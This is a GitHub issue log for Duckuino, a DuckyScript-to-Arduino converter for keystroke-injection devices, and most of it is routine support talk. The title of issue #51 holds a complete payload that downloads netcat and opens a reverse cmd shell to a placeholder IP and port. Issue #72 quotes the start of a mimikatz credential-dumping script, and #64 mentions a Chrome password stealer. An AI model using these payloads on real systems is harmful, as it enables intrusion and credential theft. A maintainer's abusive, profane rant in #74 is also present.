Yep, (I'm sorry, I really didn't saw this !), I managed to get a working Dckuino.js version with modules, I also recreated the GUI, so it's more user-friendly :D I need to fix some bugs and issues, but I think I'll release it soon ;D
Also, I'm very unfamiliar with Milestone, would you like to be added as contributor, so you can create it ? @Plazmaz

[2017-05-02 22:19] Plazmaz commented on #26
I mentioned it in a comment on the last issue, but is there some way we could get in contact via email or private message of some sort?

[2017-05-02 22:19] Plazmaz commented on #26
Your previous email doesn't seem to work

[2017-05-02 22:20] Nurrl commented on #26
Oh, whoops, I changed it :3 Go hack.chat ?

[2017-05-02 22:21] Nurrl commented on #26
https://hack.chat/?dckuino

[2017-05-02 22:57] Plazmaz commented on #17
Will close this issue in a bit if we don't get a response from @JonasZaverka

[2017-05-03 15:24] pigoof commented on #27
Thanks alot , I'll give it a go &see how it works. I'll let you know of my updates. If you want you can contact me by this email - mytonicstore@hotmail.com

[2017-05-03 17:53] pigoof commented on #27
Your link doesnt work - error 404 - I cant open link. https://nurrl.github.io/Dckuino.js/.

[2017-05-03 17:54] Plazmaz commented on #27
@pigoof thanks! the link is https://nurrl.github.io/Duckuino/

[2017-05-03 18:39] pigoof commented on #27
Great!
Okay so all is working the only problem is the size is too big. Now I just started in programming a few days ago so this is all pretty new to me... Would it be possible to shorten the file? If so how?

[2017-05-03 18:41] Plazmaz commented on #27
I suggest using for loops and functions to reduce the size. I'll likely be implementing some optimization systems soon to reduce filesize drastically. Another thing you could do is remove anything you don't need. For instance, if there's a long sequence of text, see if you can shorten it. Other than that, there's not much I can do for you, sorry.

[2017-05-04 00:08] pigoof commented on #27
What do you mean ? Loops and functions? It would be great if you could explain what those are or do it to the code for me. Anyways I appreciate you sticking with me and providing fast replys. I wasn't expecting such commitment.  :) Thanks!!!

[2017-05-04 00:43] Plazmaz commented on #27
@pigoof No problem, however it is not my job to teach programming concepts, and I'm not going to write it for you, sorry. I would suggest looking into some basic C++ concepts. If not, maybe try looking at https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Duckyscript#replay for loops.

[2017-05-04 04:15] pigoof commented on #27
Perfectly understandable! :)   I have a lot of research ahead of me, appreciate your time with me!

[2017-05-05 06:45] Plazmaz commented on #17
Closing the issue due to inactivity

[2017-05-05 06:45] #17 closed

[2017-05-06 10:40] Flambello opened #28 "Ram optimization"
hello
instead of Keyboard.print("hello world");
 can you make it do Keyboard.print(F("hello world));
so that the print will not get stored in the ram and instead go in the flash memory making longer line scripts possible

the foto is of a verry long script
without the (F()) it uses around 8k ram
with the (F()) it uses only 220

![untitled](https://cloud.githubusercontent.com/assets/28274575/257717

[2017-05-07 08:24] Plazmaz commented on #28
This is something I used in the original version of Duckuino, but it seems to have gotten lost in translation. However, writing everything to flash may not be the best way of doing things, otherwise, it would probably be the default, I'll need to look into this more

[2017-05-07 08:30] Flambello commented on #28
Oooh ok thnx for the responce

[2017-05-07 08:47] Nurrl commented on #28
@Plazmaz You could add it in your post-processor :D Or we could add a checkbox to let the user decide ^^

[2017-05-07 08:56] Flambello commented on #28
Uuuu that whould be nice!

[2017-05-07 09:20] Plazmaz commented on #28
I think that sounds good. I like the idea of being able to disable it.

[2017-05-07 09:53] Flambello commented on #28
Haha best software on github!

[2017-05-07 20:01] Plazmaz commented on #28
@Flambello if you think it's good now, get ready for v2.

[2017-05-08 22:03] Flambello commented on #28
No problem im glad my suggestion helps!!!

[2017-05-12 10:47] TJHUNTER2001 commented on #25
Alt space? Why?

[2017-05-12 11:24] Nurrl commented on #25
No, forget this, ALT SPACE is to swap locales on Windows, but you need to have the english one activated .-. Worst idea I ever talked about x)

[2017-05-22 22:27] keeganjk opened #29 "No DEFAULT_DELAY"
When you try to use `DEFAULT_DELAY` or `DEFAULTDELAY` to set a default delay between each command, it results in the error, `An error occured, the compiler returned undefined content`.

According to the USB Rubber Ducky Wiki,

`DEFAULT_DELAY` simply sets a default delay time between each command.

[2017-05-23 04:55] Nurrl commented on #29
Hi, @keeganjk thanks for reporting this error, but we need more informations please :)
Please provide us :
  - The uncompiled script
  - What the compiler says (On the bottom of the page, the long bar ;D), this should help us to solve your problem..

[2017-05-23 15:11] Plazmaz commented on #29
@Nurrl I just think we haven't implemented this command. I remember noticing this at one point.

[2017-05-23 19:12] Nurrl commented on #29
@Plazmaz [Dckuino.js Line 233](https://github.com/Nurrl/Duckuino/blob/master/Dckuino.js#L233) I implemented it when I added the REPEAT command :)

[2017-06-03 06:30] keeganjk commented on #29
I've updated my comment, I've added some info.

[2017-06-04 08:34] Nurrl commented on #29
I know, but when I use it, it works... @keeganjk

[2017-06-04 08:39] Nurrl commented on #29
![screenshot from 2017-06-04 10-36-20](https://cloud.githubusercontent.com/assets/15341887/26760157/00a84df2-4912-11e7-9682-8e23b554fe9d.png)

[2017-06-04 23:27] keeganjk commented on #29
@Nurrl Not for me...
![screen shot 2017-06-04 at 19 26 28](https://cloud.githubusercontent.com/assets/24554125/26766257/c8a3fc22-495b-11e7-8ad6-c236be00d2f8.png)

[2017-06-04 23:28] Plazmaz commented on #29
@keeganjk please ensure you are running the code yourself, versus using someone else's hosted version. We've had issues with version conflicts in hosted versions of the project

[2017-06-05 00:05] keeganjk commented on #29
@Plazmaz I just downloaded it to see if the latest version worked. It didn't work.

[2017-06-05 00:10] Plazmaz commented on #29
@keeganjk I am able to reproduce with just one line, but when there's other data in the editor, it does not occur

[2017-06-05 01:15] keeganjk commented on #29
@Plazmaz @Nurrl I've found the problem! It requires multiple lines and some hosted versions are outdated.

[2017-06-05 01:15] #29 closed

[2017-06-05 01:25] Plazmaz commented on #29
@Nurrl perhaps we should give a better error for this.

[2017-06-08 18:05] TJHUNTER2001 commented on #25
Windows lang (unknown) on testing sub it's Dutch.

[2017-06-12 03:51] #26 closed

[2017-06-15 03:28] bytedeez commented on #28
@Flambello @Plazmaz
I have about 5 scripts i need to use this for. I am still learning .js and jquery at the moment
Where in the code could i make this change temporarily?
I searched through the code but nothing stuck out to a novice like myself to make this change without some expert advice,
Thanks in advance!

[2017-06-15 03:36] Plazmaz commented on #28
@bytedeez consider it done.

[2017-07-04 13:00] loidor opened #30 "Language error"
When I'm plugging in my arduino on an English computer everything works flawlessly, but when plugging it in on a Swedish one everything ends up wonky. / is for example replaced by -.

This is due to keyboard layout (Swedish keyboards does indeed have - where English ones have /). Would it be possible to force the script to adapt to the current keyboard layout?

[2017-07-04 18:17] Nurrl commented on #30
Hi @loidor, this project includes **LocaleKeyboard.js**, which is an other project, and fixes this bug, but there is currently no Swedish locale.

[2017-07-04 18:48] loidor commented on #30
Lovely, then there's a way to solve it :) I'll look into generating a Swedish contribution to **LocaleKeyboard.js**. I close this since it's kind of solved.

[2017-07-04 18:48] #30 closed

[2017-07-17 16:37] exzotic commented on #25
help i have done these steps used the download and tried the french locale on the downloader still having problems

[2017-07-17 16:56] Nurrl commented on #25
Hi @exzotic, what did you done ?

[2017-07-25 17:29] jmtzt opened #31 "Different keyboard layout"
I want to know how do I change the converter to output the code in a compatible way for other keyboard layouts, like pt-br for instance. Thanks in advance!

[2017-07-26 21:35] Nurrl commented on #31
Hi, simply use the download button on the top bar(and select locale), this will generate the needed files, just open the project and upload..

[2017-07-26 21:36] #31 closed

[2017-09-07 22:41] TheEnchantedCow opened #33 "Error When Writing to a Arduino Leo!!!"
[code]

[2017-09-07 22:43] Plazmaz commented on #33
Looks like the script is included twice. Can you send me your code?
Also, why do you have `Test.ino` and `Dckuino.js-yd1w.ino`?

[2017-09-07 22:50] TheEnchantedCow commented on #33
Yeah... Thanks for the speedy response by the way!!

/*
 * Generated with <3 by Dckuino.js, an open source project !
 */

#include "Keyboard.h"

void typeKey(uint8_t key)
{
  Keyboard.press(key);
  delay(50);
  Keyboard.release(key);
}

/* Init function */
void setup()
{
  // Begining the Keyboard stream
  Keyboard.begin();

  // Wait 500ms
  delay(500);

  delay(3000);

  Keyboard.press(KEY_LEFT_

[2017-09-08 00:59] Plazmaz commented on #33
No problem!
Okay, so it looks like you have two sketches within the same directory. I'm pretty sure this isn't allowed by Arduino by default. Try moving either `Test.ino` or ` Dckuino.js-yd1w.ino` to another directory

[2017-09-14 00:52] TheEnchantedCow commented on #33
Yeah It was that. I got it to work. This is amazing!

[2017-09-14 14:38] Plazmaz commented on #33
Happy to hear it @TheEnchantedCow! Will be closing this issue now.

[2017-09-14 14:38] #33 closed

[2017-09-21 01:33] Rafael4A opened #35 "I'm having trouble converting this code"
[code]

[2017-09-21 11:02] Nurrl commented on #35
Well @Rafael4A, but we need the error provided by the compiler to help you !

[2017-09-21 11:02] Nurrl commented on #35
For me it works perfectly well !

[2017-09-21 11:05] Rafael4A commented on #35
I’m sorry, I’ve already figured it out, it was the keyboard layout, I live
in Brazil and we use another layout here, so I changed to the us layout and
it worked. Do you intend to make a converter for other keyboard layouts?
Thanks again and sorry to bother you.

On Thu, 21 Sep 2017 at 8:02 AM Nurrl <notifications@github.com> wrote:

[2017-09-21 15:55] Nurrl commented on #35
No problem, selecting locale is W.I.P. :D

[2017-09-21 15:55] #35 closed

[2017-09-21 16:01] Rafael4A commented on #35
Thank you! Please net me know when it’s done.

On Thu, 21 Sep 2017 at 12:55 PM Nurrl <notifications@github.com> wrote:

[2017-10-01 17:04] FCucumberGames opened #36 "Problems when sending code to Arduino"
![image](https://user-images.githubusercontent.com/32435964/31056975-d67e5dde-a6fc-11e7-9e20-d3275725abd5.png)
How does it works??

[2017-10-03 15:48] Nurrl commented on #36
Maybe try to set your Board to **Arduino Mini** ?

[2017-10-03 16:25] FCucumberGames commented on #36
Thanks, I would try

[2017-10-03 16:33] FCucumberGames commented on #36
![image](https://user-images.githubusercontent.com/32435964/31136736-d469e614-a88a-11e7-88cd-ed728e38cf72.png)
OOPS, it doesn't work

[2017-10-03 16:40] Nurrl commented on #36
Have you updated to the latest Arduino IDE version ? @FCucumberGames

[2017-10-03 16:41] FCucumberGames commented on #36
Shit, I'm fucking retard. I use Arduino Nano

[2017-10-03 16:42] Nurrl commented on #36
**Arduino Nano** should work tho..

[2017-10-03 16:47] FCucumberGames commented on #36
Hmm, so, I don't know why I cannot complie this code

[2017-10-03 16:48] FCucumberGames commented on #36
It's 1.8.4 arduino IDE version

[2017-10-03 16:50] Nurrl commented on #36
There is the 1.8.5 update, but I don't thinks that's the problem..
I also noticed that the first line chnaged betwin your two screenshots:
`#include <Keyboard.h>` to `#include ""Keyboard.h"`, maybe that could be the problem..

[2017-10-03 16:53] FCucumberGames commented on #36
I have tried all variants of this line like "Keyboard.h", <Keyboard.h>, 'Keyboard.h'

[2017-10-03 17:01] FCucumberGames commented on #36
Thank you for help, but I have burned my arduino while I was brazing a button to it(((

[2017-10-03 17:03] Plazmaz commented on #36
@FCucumberGames  D: Oh noes!
https://github.com/Nurrl/Duckuino/issues/12#issuecomment-261359817 temporary workaround(too late sadly)

[2017-10-03 17:04] Plazmaz commented on #36
@Nurrl we should find a more permanent fix. Also, go ahead and push v2 if you think it's ready. I'll worry about the code optimizer later.

[2017-10-03 17:24] Nurrl commented on #36
@Plazmaz The problem is that v2 isn't ready, I didn't made the support for DEFAULTDELAY..

[2017-10-03 17:26] Nurrl commented on #36
And we need to figure out how to load modules without *evil*(**eval()**) also..

[2017-10-11 11:09] 1NoJeD1 opened #39 "."
*Short introduction of your problem.*

__Input code:__
[code]

__Output code:__
[code]

[2017-10-11 11:11] #39 closed

[2017-10-11 11:38] Nurrl commented on #36
Hi @FCucumberGames, the **v2.0-pre** has been released, can you try to compile your code again ?

[2017-10-11 11:41] Nurrl commented on #25
Hi @TJHUNTER2001, @Andsoeg and @exzotic, the **v2.0-pre** has been released, can you try again to compile the code and send it to your Arduino ?

[2017-10-11 12:08] Nurrl commented on #28
Since v2 is here and this disappeared, I'm reopening this, @Plazmaz should release the Ram Optimization update some days :D

[2017-10-11 14:13] Plazmaz commented on #28
@Nurrl nope, this is something different. This issue is asking for the use of Fstrings instead of normal strings. Should be an easy fix 😄

[2017-10-11 14:14] Nurrl commented on #28
Yep ^^ But it Optimizes ram x)

[2017-10-11 14:22] #28 closed

[2017-10-12 15:08] MrMoDDoM commented on #16
Hi, absolutely yes..!
Could you please leave this issue open just about fews days?
I'll make it as soon as possible :)

[2017-10-12 15:21] Nurrl commented on #16
No problem, just duplicate **modules/Arduino.js** in **module/MuKeyboard.js** and add a new line containing `MuKeyboard` in the **modules/modules** file ^^

[2017-10-13 15:32] FCucumberGames commented on #36
No, it still doesn't work. It's the same problem

[2017-10-18 10:18] hyWse opened #42 ""7" instead of "r""
__Input code:__
[code]
__Output code:__
[code]

Hi, when I compile this code, Windows runs GUI + 7 instead of GUI + r. (I have selected the correct keyboard)

[2017-10-18 10:40] Nurrl commented on #42
Hi @hyWse, that's interesting, what is your keyboard locale and what did you selected ?

[2017-10-18 10:59] hyWse commented on #42
I have a german keyboard and i selected de_DE

[2017-10-18 12:06] Nurrl commented on #42
That may be your hardware or your software..

[2017-10-21 05:02] m1kha1lb opened #43 "o"

[2017-10-21 07:48] Nurrl commented on #43
Wtf ? @m1kha1lb

[2017-10-21 21:11] Nurrl commented on #43
Okay let's close this.

[2017-10-21 21:11] #43 closed

[2017-10-26 17:01] #16 closed

[2017-10-28 19:18] ITHzWANip opened #45 "Issue I found when using GUI r"
*Short introduction to your problem.*

__Input code:__
[code]

__Output code:__
[code]

__Error:__
[code]

[2017-10-28 19:24] Nurrl commented on #45
Hi @ITHzWANip, are you sure that when you change `"r"` to `'r'`, the bug doesn't happen ?
What you're explaining make me think more about an Arduino power issue, like rebooting continuously and spamming `<enter>`...

[2017-10-28 20:01] ITHzWANip commented on #45
yea i would screen cap it but for whatever reason when i have my recording software up it wont replicate. But I've tested it multiple times and 'r' works over "r" every time. My theory was that any press needs to be in single quotes but that was not reliable in my testing. It might just be the board im using. Its the pro micro.

[2017-10-29 19:36] nixublx commented on #45
I noticed the double quotes are passed in the keyArray parameter of the module's computeKeys callback. For the Digispark module I already needed to strip these double quotes, as characters need to be converted to constants ( 'a' becomes KEY_A, etc.) Would it be an idea to omit the double quotes and have the board module decide how to format the character?

[2017-10-29 19:38] Nurrl commented on #45
@nixublx Yep I'll do that ^^

[2017-10-30 17:14] Nurrl commented on #45
For the v2.1, and I'll make per module locale selection by merging LocaleKeyboard.js in Duckuino ^^
@Plazmaz Do you agree with these changes ?

[2017-10-30 17:15] Plazmaz commented on #45
@Nurrl Yep, sounds good

[2017-10-30 17:19] Nurrl commented on #45
@Plazmaz Great ^^

[2018-01-09 22:02] akaped opened #50 "How to set set decoder to another language ?"
Hello,
I would like to know if it has been implemented the possibility to set another keyboard language different than English in the decoder. I'm Italian and obviously the code I translate with this software types keys that on my Italian keyboard don't make much sense.

The "original" version of the Rubbery Ducky the script compiler it's also able to compile the code with a language option, to ad

[2018-01-11 13:03] chimnho opened #51 "DELAY 400 GUI r DELAY 100 STRING cmd ENTER DELAY 100 STRING cd / & mkdir win & cd win & echo (wget 'NETCAT_DL_LINK' -OutFile a.exe) > b.PS1 & powershell -ExecutionPolicy ByPass -File b.ps1 ENTER DELAY 50 STRING START /MIN a.exe IP PORT -e cmd.exe -d & exit ENTER"
*Short introduction to your problem.*

__Input code:__
[code]

__Output code:__
[code]

__Error:__
[code]

[2018-01-18 18:26] Plazmaz commented on #50
@Nurrl I believe you have something for different layouts, right?

[2018-01-18 18:28] Nurrl commented on #50
Yes, @akaped, Normally language compiling is fully integrated with Duckuino, you select your language before downloading..
Maybe I don't get your issue..

[2018-01-22 19:18] MagicFun1241 opened #52 "T"
*Short introduction to your problem.*

__Input code:__
[code]

__Output code:__
[code]

__Error:__
[code]

[2018-01-22 19:19] MagicFun1241 opened #53 "Test"
*Short introduction to your problem.*

__Input code:__
[code]

__Output code:__
[code]

__Error:__
[code]

[2018-01-22 19:20] MagicFun1241 opened #54 "Title"
*Short introduction to your problem.*

__Input code:__
[code]

__Output code:__
[code]

__Error:__
[code]

[2018-01-22 19:22] #52 closed

[2018-01-22 19:22] #53 closed

[2018-01-22 19:22] #54 closed

[2018-01-22 19:22] Nurrl commented on #54
Wtf ? @MagicFun1241

[2018-02-03 06:07] mdey0108 opened #55 "keyboard not found"
*Short introduction to your problem.*
when we try to compile code give error ketboard not found
__Input code:__
[code]

__Output code:__
[code]

__Error:__
[code]

[2018-02-03 08:44] Nurrl commented on #55
Hi @mdey0108, This is because you need to select `Arduino Leonardo`/`Arduino Nano` as *Board Type* in Arduino IDE.
This won't work with Arduino UNO.

[2018-02-03 08:46] #55 closed

[2018-02-05 17:10] hackerman111 opened #56 "ee"
*Short introduction to your problem.*

__Input code:__
[code]

__Output code:__
[code]

__Error:__
[code]

[2018-02-05 17:11] Plazmaz commented on #56
This is an empty issue. Please provide more info.

[2018-02-16 14:08] yevheniy2407 opened #57 "change ESCAPE:'KEY_LEFT_ESC' to ESCAPE:'KEY_ESC'"
*Short introduction to your problem.*

__Input code:__
[code]

__Output code:__
[code]

__Error:__
[code]

[2018-02-16 14:46] Nurrl commented on #57
Hi @yevheniy2407, this has already been done on the latest version, please precise from when you came !

[2018-02-19 21:14] acujl opened #58 "Help? This is weird.."
The Problem basicly: http://prntscr.com/ih1o8d

If u don't trust the link..

**Code:**
#include "Keyboard.h"

void typeKey(int key)
{
  Keyboard.press(key);
  delay(50);
  Keyboard.release(key);
}

void setup()
{
  // Begining the Keyboard stream
  Keyboard.begin();

  // Wait 500ms
  delay(500);

  delay(3000);

  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press('r');
  Keyboard.releaseAll();

  de

[2018-02-20 06:16] Nurrl commented on #58
Hi @acujl, to me it looks like you're trying to upload this code on an unsuported board..
On what type of Arduino(or Clone) are you trying to make this work with ?

[2018-02-20 20:44] acujl commented on #58
Yes, (well probably a clone yeah) it's a Pro Micro. With a processor Atmel MEGA32U4 as requested to "transform" the arduino into a bad usb (?)

Well I already have the CH341SER driver installed, I don't know what's wrong.. But I guess that the computer doesn't even detects it
![28308388_1849676971733861_1594807629_n](https://user-images.githubusercontent.com/30632902/36448229-d29f0460-167e-11e8-8a

[2018-02-20 20:50] Nurrl commented on #58
It should be good to go, but in the tools tab of the Arduino IDE, please make sure that "Arduino Pro Micro" is selected, then you'll be able to compile the Sketch !

[2018-02-22 06:09] Nurrl commented on #58
Did it worked ? @acujl

[2018-02-22 13:48] acujl commented on #58
My PC isn't able to detect it for some reason :/ any thoughts on that? Or do you know other way to program it? I have uno too!

[2018-02-23 14:39] Wesz808 opened #59 "A small problem"
With every script I convert I get the same problem.
The first thing that is executed on Windows is the magnifier. And I have seriously no idea why.
The rest of the code executes without any problems.

So when I convert for example this Ducky Script

The result is:
It opens magnifier
and prints:

In whatever screen is open.

So my first thought was that it is a keyboard issue. But I got a standard

[2018-02-23 16:25] Nurrl commented on #59
Hi @Wesz808, simple question, but on what hardware are you running this code ?

[2018-02-23 17:21] Wesz808 commented on #59
It's running it on a Arduino Leonardo USB. The only thing my own research came to was it has something to do with HID functionality? Since i'm new to this, I really miss some basics which i'm trying to learn.
It gives this error as output I see now.

[2018-02-23 17:26] Nurrl commented on #59
These are only warnings, since the Sketch compiles, I think this has nothing to do with the code..
What are your thought @Plazmaz ?

[2018-02-23 19:22] Plazmaz commented on #59
Hmm. It doesn't look to be a compilation error. Try increasing your delays to run very slowly.

[2018-02-23 20:15] acujl commented on #58
Well problem solved, just changed the cable :V
Sorry for the inconvenience!

P.S: Showed up as Leonardo but worked just fine!

[2018-02-23 21:08] Nurrl commented on #58
No problem @acujl, most of the Chinese cables are charge-only, I did thought about that :v

[2018-02-23 21:08] #58 closed

[2018-02-23 21:10] #51 closed

[2018-02-23 21:10] #56 closed

[2018-02-23 21:12] Nurrl commented on #57
of #20.

[2018-02-23 21:12] #57 closed

[2018-02-24 08:54] Wesz808 commented on #59
Already tried. Also, a different USB. Got the same result (only slower). I'll try compiling it using a different computer. Don't think it will make a difference. But can't hurt excluding possibilities...

[2018-02-24 16:38] Wesz808 commented on #59
Same problem on my laptop (was using my desktop before). Same error, it compiles but opens the magnifier is executed.

[2018-03-07 12:56] Nurrl commented on #59
Hmm, that's very annoying, the magnifier shortcut is `GUI` + `+`. So the Arduino prints `+` instead of `r` ? Can you try to compile and use the following DuckyScript code :
[code]
And execute it with notepad opened to see if it prints a `+`.

[2018-03-07 12:58] Nurrl commented on #59
If it's printing `+`, I may have a fix, it could be a `const char*` -> `unsigned char` cast error.

[2018-03-20 21:21] Cyberdade opened #61 "⚠ - Error: Unknown command or key 'KEY_LEFT_ARROW' at line: 10."
*I tried to modify the Pesce's code with KEY_LEFT_ARROW, but your converter doesn't translate it!*
But in official Arduino documentation https://www.arduino.cc/en/Reference/KeyboardModifiers KEY_LEFT_KEY exist!

__Input code:__
[code]

__Output code:__
[code]

__Error:__
[code]

[2018-03-21 03:05] Plazmaz commented on #61
This looks similar to an old bug. Was this on a fresh clone?

[2018-03-21 06:32] Nurrl commented on #61
Hi @Cyberdade, to me it looks like you're trying to use an Arduino constant `KEY_LEFT_ARROW` instead of the DuckyScript command which is either `LEFT` or `LEFTARROW`.

[2018-03-21 06:33] Nurrl commented on #61
So yes, `KEY_LEFT_ARROW` is undefined to the DuckyScript interpreter.

[2018-03-21 06:33] Plazmaz commented on #61
Derp, nice catch @Nurrl. Totally didn't even think about that.

[2018-03-21 06:36] Nurrl commented on #61
Thanks @Plazmaz ;)

[2018-03-21 13:12] Cyberdade commented on #61
Thanks @Nurrl, when I return home I'll try it.

[2018-03-21 16:11] Cyberdade commented on #61
Now work, thanks @Nurrl

[2018-03-21 16:11] #61 closed

[2018-04-14 09:21] Tobi15Online opened #62 "Default_delay not working"
Well, the title is pretty self explanatory.

DEFAULT_DELAY 200 gives out an error in the console

[2018-04-14 11:36] Nurrl commented on #62
Hi @Tobi15Online, can you provide a screenshot of the error ? Thanks.

[2018-04-25 10:52] slusc10 opened #63 "please help i cant find the libraries"
i need the libraries

[2018-04-25 11:35] Nurrl commented on #63
Hi, can you provide the error message, otherwise I will close your issue.

[2018-04-25 11:38] slusc10 commented on #63
On Wed, 25 Apr 2018 at 9:35 pm, Nurrl <notifications@github.com> wrote:

Hey I’m sorry I was just trying to find the library’s for the arduino if
you could asssist me but otherwise I’m fine with you taking it down I have
no errors yet but good job staying live night talk soon

[2018-04-25 11:39] Nurrl commented on #63
What are you exactly searching ?

[2018-04-25 11:41] slusc10 commented on #63
On Wed, 25 Apr 2018 at 9:39 pm, Nurrl <notifications@github.com> wrote:

Umm I was on the raw code to arduino converter and I had troubles with the
keyboard.h files

[2018-04-25 11:49] Nurrl commented on #63
Oh, please make sure that you're compiling for a supported board. Arduino UNO is **NOT** supported.  !

[2018-04-27 23:59] northboys opened #64 "how to fix eror in line 32 chrome password stealer"
*Short introduction to your problem.*

__Input code:__
[code]

__Output code:__
[code]

__Error:__
[code]

[2018-04-28 00:02] Nurrl commented on #64
Since this is a malformed issue, I'll close it utill you respect the guideline of the issue.

[2018-04-28 00:02] #64 closed

[2018-04-28 00:04] #42 closed

[2018-04-28 00:05] #25 closed

[2018-04-28 00:06] #63 closed

[2018-04-28 00:07] Nurrl commented on #62
Didn't answered, working for me -> Issue closed.

[2018-04-28 00:07] #62 closed

[2018-04-28 00:12] #50 closed

[2018-04-29 06:26] northboys opened #65 "how to fix this...?"
*Short introduction to your problem.*

__Input code:__
[code]

__Output code:__
[code]

__Error:__
[code]

[2018-04-29 06:34] Plazmaz commented on #65
Hi, this issue is empty. Closing this, please resubmit with the fields filled out.

[2018-04-29 06:34] #65 closed

[2018-04-29 06:45] northboys opened #66 "how to fix this"
[[*Short]([url](](url
![capture](https://user-images.githubusercontent.com/38155944/39403998-8a3a79a6-4bb3-11e8-9a13-a87c709737b4.PNG)
)

)) introduction to your problem.*

__Input code:__
[code]

__Output code:__
[code]

__Error:__
[code]

[2018-04-29 09:23] rushabhpnagda opened #67 "when i uplode the code it shows that "there is a error in as no key board found""
*Short introduction to your problem.*

__Input code:__
[code]

__Output code:__
[code]

__Error:__
[code]

[2018-04-30 03:39] Plazmaz commented on #66
Hi, as @Nurrl stated, your version is out of date. Please also make sure you fill out the issue fields properly. It makes it much easier for us to debug the issue.

[2018-04-30 03:39] #66 closed

[2018-05-05 14:17] #67 closed, assigned to nobody

[2018-05-23 13:29] KasperSvendsen opened #68 "Digispark"
*Short introduction to your problem.*

I tried submitting code with the Arduino IDE to a Digispark. It gives me this error:
Keyboard.h:25:17: fatal error: HID.h: No such file or directory
 #include "HID.h"

Looks like some compatibility issues with the digispark. Can you add a feature that enables support for this device?

__Input code:__
[code]

__Output code:__
[code]

__Error:__
[code]

[2018-05-23 13:41] Nurrl commented on #68
Hi @KasperSvendsen, to use the Digispark, you need to use the little down carret on the "Compile" button then click compile and download. It is supported.

Let me know if you have other issues after doing that.

[2018-05-23 23:50] Nurrl commented on #68
I'll close the issue, because I don't get your issue, feel free to send another message here if you need any support !

[2018-05-23 23:50] #68 closed

[2018-05-27 20:08] DoebelnAtz opened #69 "Unable to download sketch (MacOSX)"
Using a 2013 macbook air (10.12.3) i am unable to download my sketch on Chrome, Safari or Firefox, both Chrome and Firefox give me an unresponsive download window (can't input locale) and Safari fails to download.

[2018-05-31 06:08] Nurrl commented on #69
Hi @DoebelnAtz, what are the versions of the those softwares and are you using the latest, live version of Duckuino ?

[2018-06-08 11:27] jvlavl opened #70 "Error: No module loaded!"
Hello,

I have dowloaded duckuino to my local webserver and configured this virtual host to listen to port 81
When I open the site http://hostip:81 site is loading correctly.

pasting the ducky code in it the compile button lights up but when I hit it It gives me the error No module loaded!

How can I solve this?

__Input code:__
[code]

Rgds,

John

[2018-06-09 10:28] bdstr opened #71 "CTRL-SHIFT"
*Short introduction to your problem.*

__Input code:__
[code]

__Output code:__
[code]

__Error:__
[code]

[2018-06-09 10:50] Nurrl commented on #71
Hi @bdstr, `CTRL-SHIFT` is an invalid keyword, try `CTRL SHIFT` instead.
Tell me if it resolved it !

[2018-06-09 12:12] Nurrl commented on #70
Hi @jvlavl, I gonna need a screenshot please.

[2018-06-09 13:07] bdstr commented on #71
Yes, of course it worked now! The problem is with payloads from the list linked on the Duckuino live page.
Thanks for helping!

[2018-06-09 13:07] #71 closed

[2018-06-11 06:21] jvlavl commented on #70
Hello,

Here is the requested screenshot.
![modulemissing](https://user-images.githubusercontent.com/39025097/41215378-51aef968-6d50-11e8-9e41-4e1474038955.PNG)

Thanks in advance

[2018-06-11 14:29] DoebelnAtz commented on #69
I'm using the latest version of all those browsers and the live version of Dckuino

[2018-06-11 16:24] Nurrl commented on #70
Hi @jvlavl, have you selected a module with the caret on the compile button ?

[2018-06-11 16:25] Nurrl commented on #69
And what does the page do ? Do you have any error popup or nothing happens ?

[2018-06-11 18:01] jvlavl commented on #70
Hello,

That"s also part of the issue i Can 't select a module. Aldo they are present in the root directory of the site.

Just die a git globe info/var/www/ducky apache config is pointing to /var/www/Lucky

Rgds,

John

[2018-06-11 18:14] Nurrl commented on #70
Can you open the Javascript console and refresh + try to compile and send a screnshot of the console ?

[2018-06-11 18:14] Nurrl commented on #70
I think there is a problem of module loading ^^

[2018-06-12 14:34] jvlavl commented on #70
Hello,
Hereby the requested screenshots

![modulemissing](https://user-images.githubusercontent.com/39025097/41296988-6f123fa6-6e5e-11e8-81eb-30f4009cc5d8.PNG)

![modulemissing1](https://user-images.githubusercontent.com/39025097/41297001-73614b9c-6e5e-11e8-94c3-d9345b823c4b.PNG)

Rgds,

John

[2018-06-12 16:40] Nurrl commented on #70
Hi @jvlavl, that's a non-issue, you can't access https://nurrl.github.io/LocaleKeyboard.js/locales/localeList with the client so the code breaks..
For now, Duckuino needs to access this file from internet to work properly.

[2018-06-12 16:42] Plazmaz commented on #70
@Nurrl won't that drive us to CORS issues?

[2018-06-12 16:44] Nurrl commented on #70
@Plazmaz CORS ?

[2018-06-12 16:45] Nurrl commented on #70
@Plazmaz Yeah, I got it, yes it will, I'm trying to merge the two projects, but now I don't have much time to do it..

[2018-07-06 10:10] Virtuoso8 opened #72 "ctrl - shift enter ??"
Hi there, I tried converting a duckyscript to an arduino code but says line 7 has a problem? AND I AM COMPLETELY NEW TO ALL OF THIS SO I APOLOGISE IF THIS IS A STUPID QUESTION

__Input code:__
REM mimikatz ducky script to dump local wdigest passwords from memory using mimikatz (local user needs to be an administrator/have admin privs)
DELAY 3000
CONTROL ESCAPE
DELAY 1000
STRING cmd
DELAY 1000
**CT

[2018-07-06 21:59] Nurrl commented on #72
Hello, from the DuckyScript documentation, the key words are `CONTROL SHIFT` instead of `CONTROL-SHIFT`.
So yeah, that's a problem on line 7 ^^

[2018-07-06 22:00] #72 closed

[2018-07-07 04:08] Virtuoso8 commented on #72
Hahah cheers man i figured that 2 minutes after i posted it.

On 7 July 2018 at 07:59, Nurrl <notifications@github.com> wrote:

[2018-07-10 15:41] dodo2709 opened #73 "Can't select a locale"
Hi I'm trying to download the sketch that i converted, but i want it with a different locale (italian) and I can't choose the locale because in the site the menu of its doesn't go down and so i can't select the locale... Someone can help me please?

P.S Sorry for my english

[2018-07-29 18:43] grawish opened #74 "wrong key"
*Short introduction to your problem.*

__Input code:__
[code]

__Output code:__
[code]

__Error:__
[code]
please change KEY_LEFT_ESC to KEY_ESC as the esc key is assigned as KEY_ESC in Arduino library
thank you
regards Grawish

[2018-07-29 19:05] Nurrl commented on #74
I'm just tired of fucking peoples who don't use the FUCKING TEMPLATE FUCKING CUNT, AND WHO DON'T JUST CHECK IF THEIR ISSUE IS REALLY A FUCKING ISSUE. THIS FUCKING CHANGE HAS BEEN MADE A FUCKING YEAR AGO. JUST TRY FUCKING THINGS BEFORE BEFORE FILLING A FUCKING ISSUE BRO.
Regards, Nurrl.

[2018-07-29 19:06] #74 closed

[2018-08-17 20:11] Build-0-Matic opened #75 "Need better instructions"
